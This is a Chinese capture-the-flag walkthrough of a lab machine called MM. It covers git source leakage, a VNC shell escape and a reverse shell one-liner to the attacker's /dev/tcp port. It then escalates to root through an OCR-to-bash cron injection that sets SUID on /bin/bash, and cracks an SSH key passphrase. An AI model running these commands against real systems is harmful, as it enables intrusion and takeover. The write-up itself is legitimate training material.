Mazesec-MM

已有的事，后必再有。已行的事，后必再行。日光之下,并无新事。—-<传道书> 1:9

---

靶机ip:192.168.56.60

难度:简单

涉及内容:

信息收集与枚举： Nmap 端口与服务探测 、域名绑定测试。

Web 安全： Git 源码泄露利用 (git-dumper) 、Git 提交历史审计与凭据恢复 (git log, git diff) 。

图形化界面逃逸： VNC 登录 、利用 XFCE 桌面 Application Finder 绕过受限 Shell (nologin) 执行反弹 Shell 。

本地信息收集： 使用 pspy64 监控系统进程与隐藏 Cron 计划任务 。

权限提升 (Root)： 审计自定义 Bash 脚本 、利用 OCR 工具 (gocr) 读取图片文本导致的命令注入 、SUID 权限滥用 (chmod u+s /bin/bash) 。

凭据破解 (横向移动)： 提取 SSH 私钥 (id_ed25519) 、使用 ssh2john 和 John the Ripper 爆破私钥密码 。

---

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.60
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-24 08:02 +0000
Nmap scan report for 192.168.56.60 (192.168.56.60)
Host is up (0.00058s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5901/tcp open  vnc-1
6001/tcp open  X11:1
MAC Address: 08:00:27:A6:D8:1D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.60 -sC -sV -T4 -A -O
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-24 08:03 +0000
Nmap scan report for 192.168.56.60 (192.168.56.60)
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Hi
| http-git: 
|   192.168.56.60:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: 4 
5901/tcp open  vnc     VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     VNC Authentication (2)
|     Tight (16)
|   Tight auth subtypes: 
|_    STDV VNCAUTH_ (2)
6001/tcp open  X11     (access denied)
MAC Address: 08:00:27:A6:D8:1D (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.56.60 (192.168.56.60)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds

比较不常见的是开放了5901的VNC端口和6001的X11端口.

nmap的脚本探测到git泄露,使用git-dumper下载下来

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# git-dumper http://192.168.56.60/.git/ MM
[-] Testing http://192.168.56.60/.git/HEAD [200]
[-] Testing http://192.168.56.60/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.56.60/.git/ [200]
[-] Fetching http://192.168.56.60/.gitignore [404]
[-] http://192.168.56.60/.gitignore responded with status code 404
[-] Fetching http://192.168.56.60/.git/description [200]
[-] Fetching http://192.168.56.60/.git/branches/ [200]
[-] Fetching http://192.168.56.60/.git/info/ [200]
[-] Fetching http://192.168.56.60/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.56.60/.git/config [200]
[-] Fetching http://192.168.56.60/.git/hooks/ [200]
[-] Fetching http://192.168.56.60/.git/info/exclude [200]
[-] Fetching http://192.168.56.60/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.56.60/.git/refs/ [200]
[-] Fetching http://192.168.56.60/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.56.60/.git/objects/ [200]
[-] Fetching http://192.168.56.60/.git/refs/heads/ [200]
[-] Fetching http://192.168.56.60/.git/refs/tags/ [200]
[-] Fetching http://192.168.56.60/.git/hooks/update.sample [200]
[-] Fetching http://192.168.56.60/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://192.168.56.60/.git/refs/heads/master [200]
[-] Fetching http://192.168.56.60/.git/objects/2d/ [200]
[-] Fetching http://192.168.56.60/.git/objects/19/ [200]
[-] Fetching http://192.168.56.60/.git/objects/67/ [200]
[-] Fetching http://192.168.56.60/.git/objects/bd/ [200]
[-] Fetching http://192.168.56.60/.git/objects/b8/ [200]
[-] Fetching http://192.168.56.60/.git/objects/90/ [200]
[-] Fetching http://192.168.56.60/.git/objects/ab/ [200]
[-] Fetching http://192.168.56.60/.git/objects/f7/ [200]
[-] Fetching http://192.168.56.60/.git/objects/f9/ [200]
[-] Fetching http://192.168.56.60/.git/objects/f6/ [200]
[-] Fetching http://192.168.56.60/.git/objects/19/36b7f0b8bc34642423c19738fab503a9d967de [200]
[-] Fetching http://192.168.56.60/.git/objects/67/3b2216187128dc73088ac5df036e854798c68f [200]
[-] Fetching http://192.168.56.60/.git/objects/info/ [200]
[-] Fetching http://192.168.56.60/.git/objects/pack/ [200]
[-] Fetching http://192.168.56.60/.git/objects/f7/cc50a34b65f1c6cf3c8bd10e2b78271c348e35 [200]
[-] Fetching http://192.168.56.60/.git/objects/2d/ce93ea08ed9059be0a838c6bcf62b7b5c28907 [200]
[-] Fetching http://192.168.56.60/.git/objects/f9/f7d8ba3292488a6e7f9fa21d0968ca7bbd6637 [200]
[-] Fetching http://192.168.56.60/.git/objects/f6/86416a62f2dc219fc3d6168fd0ae38516f6422 [200]
[-] Fetching http://192.168.56.60/.git/objects/b8/295d6c67f5f2df8a3649af13bf6867b221cd17 [200]
[-] Fetching http://192.168.56.60/.git/objects/ab/d028b26786a20ba6f9dfe4de5305b7341c2395 [200]
[-] Fetching http://192.168.56.60/.git/objects/90/15a7a32ca0681be64471d3ac2f8c1f24c1040d [200]
[-] Fetching http://192.168.56.60/.git/objects/bd/9990a1d46f17332711ccdf1d5ca32d584ae5c3 [200]
[-] Fetching http://192.168.56.60/.git/HEAD [200]
[-] Fetching http://192.168.56.60/.git/index [200]
[-] Fetching http://192.168.56.60/.git/logs/ [200]
[-] Fetching http://192.168.56.60/.git/logs/HEAD [200]
[-] Fetching http://192.168.56.60/.git/logs/refs/ [200]
[-] Fetching http://192.168.56.60/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.56.60/.git/logs/refs/heads/master [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 1 path from the index
                                                            

┌──(root㉿kaada)-[/home/kali/Desktop/MM]
└─# git log                                 
commit 1936b7f0b8bc34642423c19738fab503a9d967de (HEAD -> master)
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date:   Sun Apr 19 00:10:25 2026 -0400

    4

commit b8295d6c67f5f2df8a3649af13bf6867b221cd17
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date:   Sun Apr 19 00:08:12 2026 -0400

    3

commit f7cc50a34b65f1c6cf3c8bd10e2b78271c348e35
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date:   Sun Apr 19 00:07:59 2026 -0400

    2

commit f9f7d8ba3292488a6e7f9fa21d0968ca7bbd6637
Author: mingmingjiu <mingmingjiu@mm.dsz>
Date:   Sun Apr 19 00:07:17 2026 -0400

    1

查看git日志,使用diff对比不同提交.

┌──(root㉿kaada)-[/home/kali/Desktop/MM]
└─# git diff 1936b7f0b8bc34642423c19738fab503a9d967de b8295d6c67f5f2df8a3649af13bf6867b221cd17
diff --git a/index.html b/index.html
index bd9990a..9015a7a 100644
--- a/index.html
+++ b/index.html
@@ -1,110 +1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Hi</title>
-    <style>
-        * {
-            margin: 0;
-            padding: 0;
-            box-sizing: border-box;
-        }
-        
-        body {
-            font-family: 'Georgia', 'Times New Roman', serif;
-            background: linear-gradient(135deg, #2c3e50 0%, #4a6491 100%);
-            min-height: 100vh;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            color: #f5f5f5;
-            padding: 20px;
-        }
-        
-        .container {
-            text-align: center;
-            max-width: 800px;
-            width: 100%;
-        }
-        
-        .quote-box {
-            background: rgba(255, 255, 255, 0.08);
-            border-radius: 15px;
-            padding: 50px 40px;
-            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.4);
-            border: 1px solid rgba(255, 255, 255, 0.1);
-            backdrop-filter: blur(5px);
-        }
-        
-        .quote {
-            font-size: 2.2rem;
-            line-height: 1.5;
-            font-weight: 300;
-            margin-bottom: 30px;
-            position: relative;
-        }
-        
-        .quote:before, .quote:after {
-            font-size: 4rem;
-            color: rgba(255, 255, 255, 0.2);
-            position: absolute;
-        }
-        
-        .quote:before {
-            content: "“";
-            top: -20px;
-            left: -15px;
-        }
-        
-        .quote:after {
-            content: "”";
-            bottom: -50px;
-            right: -15px;
-        }
-        
-        .author {
-            font-size: 1.2rem;
-            color: #a8d0e6;
-            font-style: italic;
-            margin-top: 30px;
-        }
-        
-        .highlight {
-            color: #f76c6c;
-            font-weight: 400;
-        }
-        
-        .footer {
-            margin-top: 40px;
-            font-size: 0.9rem;
-            color: rgba(255, 255, 255, 0.4);
-        }
-        
-        @media (max-width: 768px) {
-            .quote-box {
-                padding: 30px 20px;
-            }
-            
-            .quote {
-                font-size: 1.8rem;
-            }
-            
-            .quote:before, .quote:after {
-                font-size: 3rem;
-            }
-        }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <div class="quote-box">
-            <p class="quote">
-                The only way to do great work is to love what you do. 
-                If you haven't found it yet, keep looking. Don't settle.
-            </p>
-            <p class="author">— Steve Jobs</p>
-        </div>
-    </div>
-</body>
-</html>
+index
-            color: #a8d0e6;
-            font-style: italic;
-            margin-top: 30px;
-        }
-        
-        .highlight {
-            color: #f76c6c;
-            font-weight: 400;
-        }
-        
-        .footer {
-            margin-top: 40px;
-            font-size: 0.9rem;
-            color: rgba(255, 255, 255, 0.4);
-        }
-        
-        @media (max-width: 768px) {
-            .quote-box {
-                padding: 30px 20px;
-            }
-            
-            .quote {
-                font-size: 1.8rem;
-            }
-            
-            .quote:before, .quote:after {
-                font-size: 3rem;
-            }
-        }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <div class="quote-box">
-            <p class="quote">
-                The only way to do great work is to love what you do. 
-                If you haven't found it yet, keep looking. Don't settle.
-            </p>
-            <p class="author">— Steve Jobs</p>
-        </div>
-    </div>
-</body>
-</html>
+index
-            color: #a8d0e6;
-            font-style: italic;
-            margin-top: 30px;
-        }
-        
-        .highlight {
-            color: #f76c6c;
-            font-weight: 400;
-        }
-        
-        .footer {
-            margin-top: 40px;
-            font-size: 0.9rem;
-            color: rgba(255, 255, 255, 0.4);
-        }
-        
-        @media (max-width: 768px) {
-            .quote-box {
-                padding: 30px 20px;
-            }
-            
-            .quote {
-                font-size: 1.8rem;
-            }
-            
-            .quote:before, .quote:after {
-                font-size: 3rem;
-            }
-        }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <div class="quote-box">
-            <p class="quote">
-                The only way to do great work is to love what you do. 
-                If you haven't found it yet, keep looking. Don't settle.
-            </p>
-            <p class="author">— Steve Jobs</p>
-        </div>
-    </div>
-</body>
-</html>
+index
-            color: #a8d0e6;
-            font-style: italic;
-            margin-top: 30px;
-        }
-        
-        .highlight {
-            color: #f76c6c;
-            font-weight: 400;
-        }
-        
-        .footer {
-            margin-top: 40px;
-            font-size: 0.9rem;
-            color: rgba(255, 255, 255, 0.4);
-        }
-        
-        @media (max-width: 768px) {
-            .quote-box {
-                padding: 30px 20px;
-            }
-            
-            .quote {
-                font-size: 1.8rem;
-            }
-            
-            .quote:before, .quote:after {
-                font-size: 3rem;
-            }
-        }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <div class="quote-box">
-            <p class="quote">
-                The only way to do great work is to love what you do. 
-                If you haven't found it yet, keep looking. Don't settle.
-            </p>
-            <p class="author">— Steve Jobs</p>
-        </div>
-    </div>
-</body>
-</html>
+index
(END)

┌──(root㉿kaada)-[/home/kali/Desktop/MM]
└─# git diff f7cc50a34b65f1c6cf3c8bd10e2b78271c348e35 f9f7d8ba3292488a6e7f9fa21d0968ca7bbd6637
diff --git a/pass.txt b/pass.txt
deleted file mode 100644
index 673b221..0000000
--- a/pass.txt
+++ /dev/null
@@ -1 +0,0 @@
-password:sublarge

泄露口令,sublarge,同时泄露用户名,mingmingjiu,以及域名,mm.dsz

192.168.56.60 mm.dsz

访问域名mm.dsz,有个登录界面

使用刚刚得到的mingmingjiu:12345678弱口令爆破登录

但是前端按钮是disable的.,执行不了命令,使用POST传参也无果.(后面会发现这只是个空壳界面)

尝试登录VNC

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vncviewer 192.168.56.60:5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: 

使用刚刚获得的用户名mingmingjiu作为密码就可以登录上去,桌面上就有user.txt

但打开终端失败.

查看index.php会发现我们的猜测是对的,后端根本没有处理参数,只是个空壳界面

现在要做的事是反弹shell到我们的kali上

已经通过 vncviewer 在 Kali 上看到 XFCE 完整桌面。即使账户 shell 是 /usr/sbin/nologin，XFCE 的 Application Finder (Run Program) 仍可启动任意命令。

点击 Applications 菜单

点击 Run Program...** 弹出 Application Finder

在输入框键入反弹shell命令

bash -c 'bash -i >& /dev/tcp/192.168.56.104/4444 0>&1'

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.18.0.1 • 172.17.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from MM-192.168.56.60-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/MM~192.168.56.60_Linux_x86_64/2026_04_24-08_49_05-768.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
mingmingjiu@MM:~$ 

成功收到mingmingjiu身份的反弹shell

上传pspy64和linpeas进行扫描

mingmingjiu@MM:~$ busybox wget 192.168.56.104/pspy64
Connecting to 192.168.56.104 (192.168.56.104:80)
pspy64               100% |***********************************************************************************************************| 3032k  0:00:00 ETA
mingmingjiu@MM:~$ chmod +x pspy64 
mingmingjiu@MM:~$ 

2026/04/24 04:51:46 CMD: UID=0     PID=2      | 
2026/04/24 04:51:46 CMD: UID=0     PID=1      | /sbin/init 
2026/04/24 04:52:01 CMD: UID=0     PID=1566   | /usr/sbin/CRON -f 
2026/04/24 04:52:01 CMD: UID=0     PID=1567   | /usr/sbin/CRON -f 
2026/04/24 04:52:01 CMD: UID=0     PID=1569   | /bin/sh -c /bin/bash /opt/a.sh 
2026/04/24 04:52:02 CMD: UID=0     PID=1571   | /bin/bash /opt/a.sh 
2026/04/24 04:52:02 CMD: UID=0     PID=1570   | /bin/bash /opt/a.sh 
2026/04/24 04:52:02 CMD: UID=0     PID=1572   | gocr /tmp/go.png 
2026/04/24 04:52:02 CMD: UID=0     PID=1573   | sh -c pngtopnm "/tmp/go.png" 

可以看到root的定时任务以及脚本.

mingmingjiu@MM:~$ cat /opt/a.sh
#!/bin/bash

gocr /tmp/go.png |bash
mingmingjiu@MM:~$ 

脚本的内容是ocr识图然后bash执行.

那我们可以自己创建一个恶意的图片文件让脚本来识别并执行

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# convert -size 600x80 xc:white -font DejaVu-Sans-Mono-Bold \
  -pointsize 36 -fill black \
  -annotate +10+50 'chmod u+s /bin/bash' \
  /tmp/go.png

mingmingjiu@MM:~$ cd /tmp
mingmingjiu@MM:/tmp$ wget 192.168.56.104/go.png
--2026-04-24 04:55:31--  http://192.168.56.104/go.png
Connecting to 192.168.56.104:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2846 (2.8K) [image/png]
Saving to: ‘go.png’

go.png                                 100%[===========================================================================>]   2.78K  --.-KB/s    in 0s      

2026-04-24 04:55:31 (348 MB/s) - ‘go.png’ saved [2846/2846]

mingmingjiu@MM:/tmp$ 

等待一分钟后,即可看到/bin/bash被加上了suid位.

mingmingjiu@MM:/tmp$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
mingmingjiu@MM:/tmp$ 

---

二补,关于用户ll104567

我们会在linpeas的扫描结果中发现大量类似ssh私钥的文件

╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                                                                                     
/home/mingmingjiu/Desktop/user.txt
/home/mingmingjiu/Downloads/id_ed10000
/home/mingmingjiu/Downloads/id_ed10001
/home/mingmingjiu/Downloads/id_ed10002
/home/mingmingjiu/Downloads/id_ed10003
/home/mingmingjiu/Downloads/id_ed10004
/home/mingmingjiu/Downloads/id_ed10005
/home/mingmingjiu/Downloads/id_ed10006
/home/mingmingjiu/Downloads/id_ed10007
/home/mingmingjiu/Downloads/id_ed10008
/home/mingmingjiu/Downloads/id_ed10009
/home/mingmingjiu/Downloads/id_ed10010
/home/mingmingjiu/Downloads/id_ed10011
/home/mingmingjiu/Downloads/id_ed10012
/home/mingmingjiu/Downloads/id_ed10013
/home/mingmingjiu/Downloads/id_ed10014
/home/mingmingjiu/Downloads/id_ed10015
/home/mingmingjiu/Downloads/id_ed10016
/home/mingmingjiu/Downloads/id_ed10017
/home/mingmingjiu/Downloads/id_ed10018
/home/mingmingjiu/Downloads/id_ed10019
/home/mingmingjiu/Downloads/id_ed10020
/home/mingmingjiu/Downloads/id_ed10021
/home/mingmingjiu/Downloads/id_ed10022
/home/mingmingjiu/Downloads/id_ed10023
/home/mingmingjiu/Downloads/id_ed10024
/home/mingmingjiu/Downloads/id_ed10025
/home/mingmingjiu/Downloads/id_ed10026
/home/mingmingjiu/Downloads/id_ed10027

很明显,私钥id_ed25519是正确的私钥

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# mv /root/.penelope/MM~192.168.56.60_Linux_x86_64/downloads/home/mingmingjiu/Downloads/id_ed25519 .
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh2john id_ed25519 > ssh.hash
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john ssh.hash --wordlist=rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678         (id_ed25519)     
1g 0:00:00:00 DONE (2026-04-24 09:07) 1.123g/s 35.95p/s 35.95c/s 35.95C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

可以登入ll404567

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh ll104567@192.168.56.60 -i id_ed25519 
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_ed25519': 
Linux MM 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
-bash-5.0$ id
uid=1001(ll104567) gid=1001(ll104567) groups=1001(ll104567)
-bash-5.0$ 

不过之后还是要回到pspy64提权.